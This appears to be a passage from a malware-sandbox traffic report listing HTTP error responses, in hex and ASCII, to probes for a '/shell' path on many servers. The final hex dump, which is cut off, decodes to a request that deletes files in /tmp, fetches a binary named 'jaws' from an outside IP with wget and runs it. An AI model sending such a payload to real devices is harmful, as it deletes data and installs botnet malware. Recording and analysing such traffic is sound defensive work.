Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: Apache/2.4.25 (Debian) mod_fcgid/2.3.9 OpenSSL/1.0.2uContent-Length: 196Keep-Alive: timeout=60, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 10:12:17 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 01 Nov 2021 09:10:06 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Oct 2021 12:37:23 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 179Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:02:58 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 15 Jan 1970 20:16:03 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:10 GMTServer: Apache/2.4.51 (Raspbian)Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Raspbian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:50:27 GMTServer: cisco-IOSConnection: closeAccept-Ranges: noneData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 13:09:03 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:21:35 GMTServer: Apache/2.2.22 (Win32) mod_jk/1.2.37Content-Length: 1229Cache-Control: max-age=3600Expires: Mon, 01 Nov 2021 09:22:05 GMTVary: Accept-EncodingKeep-Alive: timeout=5, max=150Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 66 6f 6e 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 43 75 73 74 6f 6d 20 73 74 6c 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 48 54 4d 4c 35 20 73 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 66 6f 72 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 20 57 41 52 4e 49 4e 47 3a 20 52 65 73 70 6f 6e 64 2e 6a 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 69 66 20 79 6f 75 20 76 69 65 77 20 74 68 65 20 70 61 67 65 20 76 69 61 20 66 69 6c 65 3a 2f 2f 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 72 65 73 70 6f 6e 64 2f 31 2e 34 2e 32 2f 72 65 73 70 6f 6e 64 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:10:17 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=euc-krDate: Mon, 01 Nov 2021 09:10:17 GMTLast-Modified: Mon, 01 Nov 2021 09:10:17 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 